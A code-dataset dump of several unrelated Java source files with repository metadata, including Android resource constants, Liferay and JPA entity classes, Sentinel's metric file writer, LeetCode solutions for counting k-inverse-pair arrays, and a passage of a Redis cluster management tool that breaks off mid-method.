name com.roomie:theme */ public static final int View_theme = 4; /** Attributes that can be used with a ViewBackgroundHelper. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ViewBackgroundHelper_android_background android:background}</code></td><td></td></tr> <tr><td><code>{@link #ViewBackgroundHelper_backgroundTint com.roomie:backgroundTint}</code></td><td> Tint to apply to the background.</td></tr> <tr><td><code>{@link #ViewBackgroundHelper_backgroundTintMode com.roomie:backgroundTintMode}</code></td><td> Blending mode used to apply the background tint.</td></tr> </table> @see #ViewBackgroundHelper_android_background @see #ViewBackgroundHelper_backgroundTint @see #ViewBackgroundHelper_backgroundTintMode */ public static final int[] ViewBackgroundHelper = { 0x010100d4, 0x7f010122, 0x7f010123 }; /** <p>This symbol is the offset where the {@link android.R.attr#background} attribute's value can be found in the {@link #ViewBackgroundHelper} array. @attr name android:background */ public static final int ViewBackgroundHelper_android_background = 0; /** <p> @attr description Tint to apply to the background. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:backgroundTint */ public static final int ViewBackgroundHelper_backgroundTint = 1; /** <p> @attr description Blending mode used to apply the background tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:backgroundTintMode */ public static final int ViewBackgroundHelper_backgroundTintMode = 2; /** Attributes that can be used with a ViewStubCompat. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ViewStubCompat_android_id android:id}</code></td><td></td></tr> <tr><td><code>{@link #ViewStubCompat_android_inflatedId android:inflatedId}</code></td><td> Overrides the id of the inflated View with this value.</td></tr> <tr><td><code>{@link #ViewStubCompat_android_layout android:layout}</code></td><td> Supply an identifier for the layout resource to inflate when the ViewStub becomes visible or when forced to do so.</td></tr> </table> @see #ViewStubCompat_android_id @see #ViewStubCompat_android_inflatedId @see #ViewStubCompat_android_layout */ public static final int[] ViewStubCompat = { 0x010100d0, 0x010100f2, 0x010100f3 }; /** <p>This symbol is the offset where the {@link android.R.attr#id} attribute's value can be found in the {@link #ViewStubCompat} array. @attr name android:id */ public static final int ViewStubCompat_android_id = 0; /** <p> @attr description Overrides the id of the inflated View with this value. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#inflatedId}. @attr name android:inflatedId */ public static final int ViewStubCompat_android_inflatedId = 2; /** <p> @attr description Supply an identifier for the layout resource to inflate when the ViewStub becomes visible or when forced to do so. The layout resource must be a valid reference to a layout. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#layout}. @attr name android:layout */ public static final int ViewStubCompat_android_layout = 1; }; }
[ "charan@brio.co.in" ]
charan@brio.co.in
db94fff3275588b06e0afdf2f18f24e6a1d49ac7
16f195e3dcc148e7f4914f19a241acbee80df355
/kiosk-portlet/docroot/WEB-INF/src/com/alpha/portlet/dmdc/model/impl/CauHinhCacheModel.java
51dcc43303fdc700b6a0897312e17b0d40fb370b
[]
no_license
osipe/Kiosk_portlet_v.1.0
294126eef6aae5f2f36e1132d7da2bcf459851c7
0dc015fde3d57a6f1572754484f687c9a4c28c89
refs/heads/master
2022-10-01T01:12:38.955263
2020-06-03T09:28:13
2020-06-03T09:28:13
269,042,885
0
0
null
null
null
null
UTF-8
Java
false
false
5,081
java
/** * Copyright (c) 2000-present Liferay, Inc. All rights reserved. * * This library is free software; you can redistribute it and/or modify it under * the terms of the GNU Lesser General Public License as published by the Free * Software Foundation; either version 2.1 of the License, or (at your option) * any later version. * * This library is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more * details. */ package com.alpha.portlet.dmdc.model.impl; import com.alpha.portlet.dmdc.model.CauHinh; import com.liferay.portal.kernel.util.StringBundler; import com.liferay.portal.kernel.util.StringPool; import com.liferay.portal.model.CacheModel; import java.io.Externalizable; import java.io.IOException; import java.io.ObjectInput; import java.io.ObjectOutput; import java.util.Date; /** * The cache model class for representing CauHinh in entity cache. * * @author darkn * @see CauHinh * @generated */ public class CauHinhCacheModel implements CacheModel<CauHinh>, Externalizable { @Override public String toString() { StringBundler sb = new StringBundler(27); sb.append("{cauHinhId="); sb.append(cauHinhId); sb.append(", groupId="); sb.append(groupId); sb.append(", companyId="); sb.append(companyId); sb.append(", userId="); sb.append(userId); sb.append(", userName="); sb.append(userName); sb.append(", createDate="); sb.append(createDate); sb.append(", modifiedDate="); sb.append(modifiedDate); sb.append(", portletId="); sb.append(portletId); sb.append(", resourceCodeId="); sb.append(resourceCodeId); sb.append(", primKey="); sb.append(primKey); sb.append(", preferences="); sb.append(preferences); sb.append(", type="); sb.append(type); sb.append(", description="); sb.append(description); sb.append("}"); return sb.toString(); } @Override public CauHinh toEntityModel() { CauHinhImpl cauHinhImpl = new CauHinhImpl(); cauHinhImpl.setCauHinhId(cauHinhId); cauHinhImpl.setGroupId(groupId); cauHinhImpl.setCompanyId(companyId); cauHinhImpl.setUserId(userId); if (userName == null) { cauHinhImpl.setUserName(StringPool.BLANK); } else { cauHinhImpl.setUserName(userName); } if (createDate == Long.MIN_VALUE) { cauHinhImpl.setCreateDate(null); } else { cauHinhImpl.setCreateDate(new Date(createDate)); } if (modifiedDate == Long.MIN_VALUE) { cauHinhImpl.setModifiedDate(null); } else { cauHinhImpl.setModifiedDate(new Date(modifiedDate)); } if (portletId == null) { cauHinhImpl.setPortletId(StringPool.BLANK); } else { cauHinhImpl.setPortletId(portletId); } cauHinhImpl.setResourceCodeId(resourceCodeId); cauHinhImpl.setPrimKey(primKey); if (preferences == null) { cauHinhImpl.setPreferences(StringPool.BLANK); } else { cauHinhImpl.setPreferences(preferences); } cauHinhImpl.setType(type); if (description == null) { cauHinhImpl.setDescription(StringPool.BLANK); } else { cauHinhImpl.setDescription(description); } cauHinhImpl.resetOriginalValues(); return cauHinhImpl; } @Override public void readExternal(ObjectInput objectInput) throws IOException { cauHinhId = objectInput.readLong(); groupId = objectInput.readLong(); companyId = objectInput.readLong(); userId = objectInput.readLong(); userName = objectInput.readUTF(); createDate = objectInput.readLong(); modifiedDate = objectInput.readLong(); portletId = objectInput.readUTF(); resourceCodeId = objectInput.readLong(); primKey = objectInput.readLong(); preferences = objectInput.readUTF(); type = objectInput.readInt(); description = objectInput.readUTF(); } @Override public void writeExternal(ObjectOutput objectOutput) throws IOException { objectOutput.writeLong(cauHinhId); objectOutput.writeLong(groupId); objectOutput.writeLong(companyId); objectOutput.writeLong(userId); if (userName == null) { objectOutput.writeUTF(StringPool.BLANK); } else { objectOutput.writeUTF(userName); } objectOutput.writeLong(createDate); objectOutput.writeLong(modifiedDate); if (portletId == null) { objectOutput.writeUTF(StringPool.BLANK); } else { objectOutput.writeUTF(portletId); } objectOutput.writeLong(resourceCodeId); objectOutput.writeLong(primKey); if (preferences == null) { objectOutput.writeUTF(StringPool.BLANK); } else { objectOutput.writeUTF(preferences); } objectOutput.writeInt(type); if (description == null) { objectOutput.writeUTF(StringPool.BLANK); } else { objectOutput.writeUTF(description); } } public long cauHinhId; public long groupId; public long companyId; public long userId; public String userName; public long createDate; public long modifiedDate; public String portletId; public long resourceCodeId; public long primKey; public String preferences; public int type; public String description; }
[ "41118842+osipe@users.noreply.github.com" ]
41118842+osipe@users.noreply.github.com
7404c69cf4c1b704ca3080c654517f7610371840
7aaa5a6246d09ccff60e39b8ff48d92058718f49
/sentinel-core/src/main/java/com/alibaba/csp/sentinel/node/metric/MetricWriter.java
ea719d118457b3a0b7748f77e07647feda3f4705
[]
no_license
zhuwei596177831/sentinel-dashboard-parent
13971a5eeff9d40a70d36b68009519115da0cac8
8c5b5ed3eb63d4a1c869e423ae1d0d0d751dc628
refs/heads/main
2023-03-09T23:31:22.029259
2021-02-25T09:41:28
2021-02-25T09:41:28
341,765,809
0
0
null
null
null
null
UTF-8
Java
false
false
14,307
java
/* * Copyright 1999-2018 Alibaba Group Holding Ltd. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.alibaba.csp.sentinel.node.metric; import com.alibaba.csp.sentinel.config.SentinelConfig; import com.alibaba.csp.sentinel.log.LogBase; import com.alibaba.csp.sentinel.log.RecordLog; import com.alibaba.csp.sentinel.util.PidUtil; import java.io.BufferedOutputStream; import java.io.DataOutputStream; import java.io.File; import java.io.FileOutputStream; import java.text.DateFormat; import java.text.SimpleDateFormat; import java.util.*; /** * This class is responsible for writing {@link MetricNode} to disk: * <ol> * <li>metric with the same second should write to the same file;</li> * <li>single file size must be controlled;</li> * <li>file name is like: {@code ${appName}-metrics.log.pid${pid}.yyyy-MM-dd.[number]}</li> * <li>metric of different day should in different file;</li> * <li>every metric file is accompanied with an index file, which file name is {@code ${metricFileName}.idx}</li> * </ol> * * @author Carpenter Lee */ public class MetricWriter { private static final String CHARSET = SentinelConfig.charset(); public static final String METRIC_BASE_DIR = LogBase.getLogBaseDir(); /** * Note: {@link MetricFileNameComparator}'s implementation relies on the metric file name, * so we should be careful when changing the metric file name. * * @see #formMetricFileName(String, int) */ public static final String METRIC_FILE = "metrics.log"; public static final String METRIC_FILE_INDEX_SUFFIX = ".idx"; public static final Comparator<String> METRIC_FILE_NAME_CMP = new MetricFileNameComparator(); private final DateFormat df = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); /** * 排除时差干扰 */ private long timeSecondBase; private String baseDir; private String baseFileName; /** * file must exist when writing */ private File curMetricFile; private File curMetricIndexFile; private FileOutputStream outMetric; private DataOutputStream outIndex; private BufferedOutputStream outMetricBuf; private long singleFileSize; private int totalFileCount; private boolean append = false; private final int pid = PidUtil.getPid(); /** * 秒级统计,忽略毫秒数。 */ private long lastSecond = -1; public MetricWriter(long singleFileSize) { this(singleFileSize, 6); } public MetricWriter(long singleFileSize, int totalFileCount) { if (singleFileSize <= 0 || totalFileCount <= 0) { throw new IllegalArgumentException(); } RecordLog.info("[MetricWriter] Creating new MetricWriter, singleFileSize={}, totalFileCount={}", singleFileSize, totalFileCount); this.baseDir = METRIC_BASE_DIR; File dir = new File(baseDir); if (!dir.exists()) { dir.mkdirs(); } long time = System.currentTimeMillis(); this.lastSecond = time / 1000; this.singleFileSize = singleFileSize; this.totalFileCount = totalFileCount; try { this.timeSecondBase = df.parse("1970-01-01 00:00:00").getTime() / 1000; } catch (Exception e) { RecordLog.warn("[MetricWriter] Create new MetricWriter error", e); } } /** * 如果传入了time,就认为nodes中所有的时间时间戳都是time. * * @param time * @param nodes */ public synchronized void write(long time, List<MetricNode> nodes) throws Exception { if (nodes == null) { return; } for (MetricNode node : nodes) { node.setTimestamp(time); } String appName = SentinelConfig.getAppName(); if (appName == null) { appName = ""; } // first write, should create file if (curMetricFile == null) { baseFileName = formMetricFileName(appName, pid); closeAndNewFile(nextFileNameOfDay(time)); } if (!(curMetricFile.exists() && curMetricIndexFile.exists())) { closeAndNewFile(nextFileNameOfDay(time)); } long second = time / 1000; if (second < lastSecond) { // 时间靠前的直接忽略,不应该发生。 } else if (second == lastSecond) { for (MetricNode node : nodes) { outMetricBuf.write(node.toFatString().getBytes(CHARSET)); } outMetricBuf.flush(); if (!validSize()) { closeAndNewFile(nextFileNameOfDay(time)); } } else { writeIndex(second, outMetric.getChannel().position()); if (isNewDay(lastSecond, second)) { closeAndNewFile(nextFileNameOfDay(time)); for (MetricNode node : nodes) { outMetricBuf.write(node.toFatString().getBytes(CHARSET)); } outMetricBuf.flush(); if (!validSize()) { closeAndNewFile(nextFileNameOfDay(time)); } } else { for (MetricNode node : nodes) { outMetricBuf.write(node.toFatString().getBytes(CHARSET)); } outMetricBuf.flush(); if (!validSize()) { closeAndNewFile(nextFileNameOfDay(time)); } } lastSecond = second; } } public synchronized void close() throws Exception { if (outMetricBuf != null) { outMetricBuf.close(); } if (outIndex != null) { outIndex.close(); } } private void writeIndex(long time, long offset) throws Exception { outIndex.writeLong(time); outIndex.writeLong(offset); outIndex.flush(); } private String nextFileNameOfDay(long time) { List<String> list = new ArrayList<String>(); File baseFile = new File(baseDir); DateFormat fileNameDf = new SimpleDateFormat("yyyy-MM-dd"); String dateStr = fileNameDf.format(new Date(time)); String fileNameModel = baseFileName + "." + dateStr; for (File file : baseFile.listFiles()) { String fileName = file.getName(); if (fileName.contains(fileNameModel) && !fileName.endsWith(METRIC_FILE_INDEX_SUFFIX) && !fileName.endsWith(".lck")) { list.add(file.getAbsolutePath()); } } Collections.sort(list, METRIC_FILE_NAME_CMP); if (list.isEmpty()) { return baseDir + fileNameModel; } String last = list.get(list.size() - 1); int n = 0; String[] strs = last.split("\\."); if (strs.length > 0 && strs[strs.length - 1].matches("[0-9]{1,10}")) { n = Integer.parseInt(strs[strs.length - 1]); } return baseDir + fileNameModel + "." + (n + 1); } /** * A comparator for metric file name. Metric file name is like: <br/> * <pre> * metrics.log.2018-03-06 * metrics.log.2018-03-07 * metrics.log.2018-03-07.10 * metrics.log.2018-03-06.100 * </pre> * <p> * File name with the early date is smaller, if date is same, the one with the small file number is smaller. * Note that if the name is an absolute path, only the fileName({@link File#getName()}) part will be considered. * So the above file names should be sorted as: <br/> * <pre> * metrics.log.2018-03-06 * metrics.log.2018-03-06.100 * metrics.log.2018-03-07 * metrics.log.2018-03-07.10 * * </pre> * </p> */ private static final class MetricFileNameComparator implements Comparator<String> { private final String pid = "pid"; @Override public int compare(String o1, String o2) { String name1 = new File(o1).getName(); String name2 = new File(o2).getName(); String dateStr1 = name1.split("\\.")[2]; String dateStr2 = name2.split("\\.")[2]; // in case of file name contains pid, skip it, like Sentinel-Admin-metrics.log.pid22568.2018-12-24 if (dateStr1.startsWith(pid)) { dateStr1 = name1.split("\\.")[3]; dateStr2 = name2.split("\\.")[3]; } // compare date first int t = dateStr1.compareTo(dateStr2); if (t != 0) { return t; } // same date, compare file number t = name1.length() - name2.length(); if (t != 0) { return t; } return name1.compareTo(name2); } } /** * Get all metric files' name in {@code baseDir}. The file name must like * <pre> * baseFileName + ".yyyy-MM-dd.number" * </pre> * and not endsWith {@link #METRIC_FILE_INDEX_SUFFIX} or ".lck". * * @param baseDir the directory to search. * @param baseFileName the file name pattern. * @return the metric files' absolute path({@link File#getAbsolutePath()}) * @throws Exception */ static List<String> listMetricFiles(String baseDir, String baseFileName) throws Exception { List<String> list = new ArrayList<String>(); File baseFile = new File(baseDir); File[] files = baseFile.listFiles(); if (files == null) { return list; } for (File file : files) { String fileName = file.getName(); if (file.isFile() && fileNameMatches(fileName, baseFileName) && !fileName.endsWith(MetricWriter.METRIC_FILE_INDEX_SUFFIX) && !fileName.endsWith(".lck")) { list.add(file.getAbsolutePath()); } } Collections.sort(list, MetricWriter.METRIC_FILE_NAME_CMP); return list; } /** * Test whether fileName matches baseFileName. fileName matches baseFileName when * <pre> * fileName = baseFileName + ".yyyy-MM-dd.number" * </pre> * * @param fileName file name * @param baseFileName base file name. * @return if fileName matches baseFileName return true, else return false. */ public static boolean fileNameMatches(String fileName, String baseFileName) { if (fileName.startsWith(baseFileName)) { String part = fileName.substring(baseFileName.length()); // part is like: ".yyyy-MM-dd.number", eg. ".2018-12-24.11" return part.matches("\\.[0-9]{4}-[0-9]{2}-[0-9]{2}(\\.[0-9]*)?"); } else { return false; } } private void removeMoreFiles() throws Exception { List<String> list = listMetricFiles(baseDir, baseFileName); if (list == null || list.isEmpty()) { return; } for (int i = 0; i < list.size() - totalFileCount + 1; i++) { String fileName = list.get(i); String indexFile = formIndexFileName(fileName); new File(fileName).delete(); RecordLog.info("[MetricWriter] Removing metric file: {}", fileName); new File(indexFile).delete(); RecordLog.info("[MetricWriter] Removing metric index file: {}", indexFile); } } private void closeAndNewFile(String fileName) throws Exception { removeMoreFiles(); if (outMetricBuf != null) { outMetricBuf.close(); } if (outIndex != null) { outIndex.close(); } outMetric = new FileOutputStream(fileName, append); outMetricBuf = new BufferedOutputStream(outMetric); curMetricFile = new File(fileName); String idxFile = formIndexFileName(fileName); curMetricIndexFile = new File(idxFile); outIndex = new DataOutputStream(new BufferedOutputStream(new FileOutputStream(idxFile, append))); RecordLog.info("[MetricWriter] New metric file created: {}", fileName); RecordLog.info("[MetricWriter] New metric index file created: {}", idxFile); } private boolean validSize() throws Exception { long size = outMetric.getChannel().size(); return size < singleFileSize; } private boolean isNewDay(long lastSecond, long second) { long lastDay = (lastSecond - timeSecondBase) / 86400; long newDay = (second - timeSecondBase) / 86400; return newDay > lastDay; } /** * Form metric file name use the specific appName and pid. Note that only * form the file name, not include path. * * Note: {@link MetricFileNameComparator}'s implementation relays on the metric file name, * we should be careful when changing the metric file name. * * @param appName * @param pid * @return metric file name. */ public static String formMetricFileName(String appName, int pid) { if (appName == null) { appName = ""; } // dot is special char that should be replaced. final String dot = "."; final String separator = "-"; if (appName.contains(dot)) { appName = appName.replace(dot, separator); } String name = appName + separator + METRIC_FILE; if (LogBase.isLogNameUsePid()) { name += ".pid" + pid; } return name; } /** * Form index file name of the {@code metricFileName} * * @param metricFileName * @return the index file name of the metricFileName */ public static String formIndexFileName(String metricFileName) { return metricFileName + METRIC_FILE_INDEX_SUFFIX; } }
[ "596177831@qq.com" ]
596177831@qq.com
37b735ff45ada40436f9d194a051a3317bb9f56b
8c464d3d87a28d90bf024fd39af56abc795283f9
/jiangling_eqis5.2.1_oracle/src/main/java/com/ambition/improve/entity/ProblemDescrible.java
dc32e75567e55eb0da79a011c8428ddd9e3124f7
[]
no_license
laonanhai481580/WeChat-Java
1a074276bf1fd62afb1f150a94ea4bde585f5ce2
047eb09b8562cb1e1659eae928f5e49c5b623625
refs/heads/master
2020-04-13T07:56:19.288005
2018-12-27T06:56:00
2018-12-27T06:56:00
163,067,001
1
0
null
null
null
null
UTF-8
Java
false
false
1,457
java
package com.ambition.improve.entity; import java.util.List; import javax.persistence.Entity; import javax.persistence.OneToMany; import javax.persistence.OrderBy; import javax.persistence.Table; import com.ambition.product.base.IdEntity; import com.fasterxml.jackson.annotation.JsonIgnoreProperties; /** * * 类名:问题描述维护 * <p>amb</p> * <p>厦门安必兴信息科技有限公司</p> * <p>功能说明:</p> * @author LPF * @version 1.00 2016年10月11日 发布 */ @Entity @Table(name = "IMP_PROBLEM_DESCRIBLE") @JsonIgnoreProperties(value={"hibernateLazyInitializer","handler","fieldHandler"}) public class ProblemDescrible extends IdEntity{ private static final long serialVersionUID = 1L; private String defectionType;//不良类型 private String model;//机种 @OneToMany(mappedBy="problemDescrible") @OrderBy("defectionPhenomenonName") List<DefectionPhenomenon> defectionPhenomenons;//不良现象 public String getDefectionType() { return defectionType; } public void setDefectionType(String defectionType) { this.defectionType = defectionType; } public List<DefectionPhenomenon> getDefectionPhenomenons() { return defectionPhenomenons; } public void setDefectionPhenomenons( List<DefectionPhenomenon> defectionPhenomenons) { this.defectionPhenomenons = defectionPhenomenons; } public String getModel() { return model; } public void setModel(String model) { this.model = model; } }
[ "1198824455@qq.com" ]
1198824455@qq.com
d639eb713273682c3dff457ca98626bc4a5685b3
264eae2691d515d014aeae9e26ed7136f86cfcff
/src/ViewModels/InvoiceViewModel.java
0cc08ee63f46d2a0869af410e9748f44dc6e115a
[]
no_license
hatemali510/Store-Invoice-Use-Case-example-
bc906faf2ee45052fea00984af587a1e897ff79c
7290c3450e0fdea61f4a5b12a6bdf2cc5a882ba6
refs/heads/master
2020-05-15T04:51:03.659029
2019-04-21T12:56:43
2019-04-21T12:56:43
182,096,022
0
0
null
null
null
null
UTF-8
Java
false
false
665
java
package ViewModels; public class InvoiceViewModel { private String customerName; private String price; private String date; public InvoiceViewModel(String customerName, String price, String date) { this.customerName = customerName; this.price = price; this.date = date; } public String getCustomerName() { return customerName; } public void setCustomerName(String customerName) { this.customerName = customerName; } public String getPrice() { return price; } public void setPrice(String price) { this.price = price; } public String getDate() { return date; } public void setDate(String date) { this.date = date; } }
[ "hatemali716@gmail.com" ]
hatemali716@gmail.com
69491ac4587d781deca74a54fc2f13df4ae27b28
0ceafc2afe5981fd28ce0185e0170d4b6dbf6241
/Interview/.leetcode/hard/k-inverse-pairs-array.java
120ce9f2413a03dd25d7a61a1b41ba4c0b4bdc02
[]
no_license
brainail/.happy-coooding
1cd617f6525367133a598bee7efb9bf6275df68e
cc30c45c7c9b9164095905cc3922a91d54ecbd15
refs/heads/master
2021-06-09T02:54:36.259884
2021-04-16T22:35:24
2021-04-16T22:35:24
153,018,855
2
1
null
null
null
null
UTF-8
Java
false
false
3,172
java
/** * Given two integers n and k, find how many different arrays consist of numbers * from 1 to n such that there are exactly k inverse pairs. * * We define an inverse pair as following: For ith and jth element in the array, * if i < j and a[i] > a[j] then it's an inverse pair; Otherwise, it's not. * * Since the answer may be very large, the answer should be modulo 109 + 7. * * Example 1: Input: n = 3, k = 0 Output: 1 Explanation: Only the array [1,2,3] * which consists of numbers from 1 to 3 has exactly 0 inverse pair. Example 2: * Input: n = 3, k = 1 Output: 2 Explanation: The array [1,3,2] and [2,1,3] have * exactly 1 inverse pair. Note: The integer n is in the range [1, 1000] and k * is in the range [0, 1000]. */ public class Solution { public int kInversePairs(int n, int k) { int[] dp = new int[k + 1]; int M = 1000000007; for (int i = 1; i <= n; i++) { int[] temp = new int[k + 1]; temp[0] = 1; for (int j = 1; j <= k; j++) { int val = (dp[j] + M - ((j - i) >= 0 ? dp[j - i] : 0)) % M; temp[j] = (temp[j - 1] + val) % M; } dp = temp; } return ((dp[k] + M - (k > 0 ? dp[k - 1] : 0)) % M); } } // approach memo (slow) /** * if we know the number of inverse pairs (say x) in any arbitrary array b with * some n items, we can add a new element n+1 (max at this moment) to this array b * at a position p * steps from the right, such that x + p = k to generate an array with a total * of k inverse pairs. */ public class Solution { Integer[][] memo = new Integer[1001][1001]; public int kInversePairs(int n, int k) { if (n == 0) return 0; if (k == 0) return 1; if (memo[n][k] != null) return memo[n][k]; int inv = 0; for (int i = 0; i <= Math.min(k, n - 1); i++) inv = (inv + kInversePairs(n - 1, k - i)) % 1000000007; memo[n][k] = inv; return inv; } } // approach dp (slow) public class Solution { public int kInversePairs(int n, int k) { int[][] dp = new int[n + 1][k + 1]; for (int i = 1; i <= n; i++) { for (int j = 0; j <= k; j++) { if (j == 0) dp[i][j] = 1; else { for (int p = 0; p <= Math.min(j, i - 1); p++) dp[i][j] = (dp[i][j] + dp[i - 1][j - p]) % 1000000007; } } } return dp[n][k]; } } // approach dp (sums), fine public class Solution { public int kInversePairs(int n, int k) { int[][] dp = new int[n + 1][k + 1]; int M = 1000000007; for (int i = 1; i <= n; i++) { for (int j = 0; j <= k; j++) { if (j == 0) dp[i][j] = 1; else { int val = (dp[i - 1][j] + M - ((j - i) >= 0 ? dp[i - 1][j - i] : 0)) % M; dp[i][j] = (dp[i][j - 1] + val) % M; } } } return ((dp[n][k] + M - (k > 0 ? dp[n][k - 1] : 0)) % M); } }
[ "wsemirz@gmail.com" ]
wsemirz@gmail.com
be6bfad6f63b5d91d7068beabd8e9b843306aaff
b952557cead34b517a77049e274a0adbeb885289
/src/main/java/com/prototype/util/DataConvert.java
a2feec264c69476ca63f26fb5ab5bc663056be75
[]
no_license
TigerLion0611/base-server
0a6e9a63f7a643776d2cfce7a6c7f189a397a36d
f1e63109eb84cb9e8c29261fcd3357c6a52edf5f
refs/heads/master
2020-03-15T12:50:43.444918
2018-05-04T14:45:41
2018-05-04T14:45:41
132,152,989
1
0
null
null
null
null
UTF-8
Java
false
false
61
java
package com.prototype.util; public class DataConvert { }
[ "2293970218@qq.com" ]
2293970218@qq.com
c80380e9e0e0c161d293513776f1c6924d2af5c3
5e55827b4db1a19714e7036c301a700a139648e9
/src/main/java/com/behase/relumin/support/RedisTrib.java
affe4464b815c208717bc6a22e85e00ebad161cb
[ "Apache-2.0" ]
permissive
makky3939/relumin
8a01866c7b91b32a40345a523c626f322633840d
4d3e116a50067080331e8111515f8888a8d9e731
refs/heads/develop
2021-01-15T11:38:34.279864
2016-04-11T02:49:43
2016-04-11T02:49:43
55,593,824
2
0
Apache-2.0
2018-06-15T10:38:09
2016-04-06T09:39:16
Java
UTF-8
Java
false
false
36,587
java
package com.behase.relumin.support; import java.io.Closeable; import java.io.IOException; import java.util.List; import java.util.Map; import java.util.Map.Entry; import java.util.Optional; import java.util.Set; import java.util.stream.Collectors; import org.apache.commons.lang3.StringUtils; import org.springframework.http.HttpStatus; import redis.clients.jedis.JedisCluster.Reset; import com.behase.relumin.Constants; import com.behase.relumin.exception.ApiException; import com.behase.relumin.exception.InvalidParameterException; import com.behase.relumin.model.ClusterNode; import com.behase.relumin.model.param.CreateClusterParam; import com.behase.relumin.util.JedisUtils; import com.behase.relumin.util.ValidationUtils; import com.google.common.collect.Lists; import com.google.common.collect.Maps; import com.google.common.collect.Sets; import lombok.Getter; import lombok.Setter; import lombok.extern.slf4j.Slf4j; /** * Almost Clone of redis-trib.rb * @author Ryosuke Hasebe * */ @Slf4j public class RedisTrib implements Closeable { private int replicas; private boolean fix; @Getter private List<String> errors = Lists.newArrayList(); @Getter private List<TribClusterNode> nodes = Lists.newArrayList(); public List<CreateClusterParam> getCreateClusterParams(int replicas, Set<String> hostAndPorts) { ValidationUtils.replicas(replicas); this.replicas = replicas; for (String hostAndPort : hostAndPorts) { hostAndPort = StringUtils.trim(hostAndPort); TribClusterNode node = new TribClusterNode(hostAndPort); node.connect(true); node.assertCluster(); node.loadInfo(); node.assertEmpty(); addNodes(node); } checkCreateParameters(); allocSlots(); return buildCreateClusterParam(); } public void createCluster(List<CreateClusterParam> params) throws Exception { ValidationUtils.createClusterParams(params); log.info("Creating cluster."); // set nodes params.forEach(param -> { int startSlot = Integer.valueOf(param.getStartSlotNumber()); int endSlot = Integer.valueOf(param.getEndSlotNumber()); List<Integer> tmpSlots = Lists.newArrayList(); for (int i = startSlot; i <= endSlot; i++) { tmpSlots.add(i); } TribClusterNode masterNode = new TribClusterNode(param.getMaster()); masterNode.connect(true); masterNode.assertCluster(); masterNode.loadInfo(); masterNode.assertEmpty(); addNodes(masterNode); param.getReplicas().forEach(replica -> { TribClusterNode replicaNode = new TribClusterNode(replica); replicaNode.connect(true); replicaNode.assertCluster(); replicaNode.loadInfo(); replicaNode.assertEmpty(); replicaNode.setAsReplica(masterNode.getInfo().getNodeId()); addNodes(replicaNode); }); masterNode.addTmpSlots(tmpSlots); }); // flush nodes config flushNodesConfig(); log.info("Nodes configuration updated."); log.info("Assign a different config epoch to each node."); // assign config epoch assignConfigEpoch(); joinCluster(); // Give one second for the join to start, in order to avoid that // wait_cluster_join will find all the nodes agree about the config as // they are still empty with unassigned slots. Thread.sleep(1000); waitClusterJoin(); flushNodesConfig(); checkCluster(); // Give one 3 second for gossip Thread.sleep(3000); } public List<String> checkCluster(String hostAndPort) { loadClusterInfoFromNode(hostAndPort); return checkCluster(); } public void fixCluster(String hostAndPort) throws Exception { fix = true; loadClusterInfoFromNode(hostAndPort); checkCluster(); // Give one 3 second for gossip Thread.sleep(3000); } public void reshardCluster(String hostAndPort, int slotCount, String fromNodeIds, String toNodeId) throws Exception { ValidationUtils.slotCount(slotCount); ValidationUtils.notBlank(toNodeId, "toNodeId"); ValidationUtils.notBlank(fromNodeIds, "fromNodeId"); loadClusterInfoFromNode(hostAndPort); checkCluster(); if (errors.size() > 0) { throw new ApiException(Constants.ERR_CODE_CLUSTER_HAS_ERRORS, "Please fix your cluster problems before resharding.", HttpStatus.BAD_REQUEST); } TribClusterNode target = getNodeByNodeId(toNodeId); if (target == null || target.hasFlag("slave")) { throw new ApiException(Constants.ERR_CODE_INVALID_PARAMETER, "The specified node is not known or is not a master, please retry.", HttpStatus.BAD_REQUEST); } List<TribClusterNode> sources = Lists.newArrayList(); if (StringUtils.equals("ALL", fromNodeIds)) { for (TribClusterNode node : nodes) { if (StringUtils.equals(node.getInfo().getNodeId(), target.getInfo().getNodeId())) { continue; } if (node.hasFlag("slave")) { continue; } if (node.getInfo().getServedSlotsSet().size() == 0) { continue; } sources.add(node); } } else { for (String fromNodeId : StringUtils.split(fromNodeIds, ",")) { TribClusterNode fromNode = 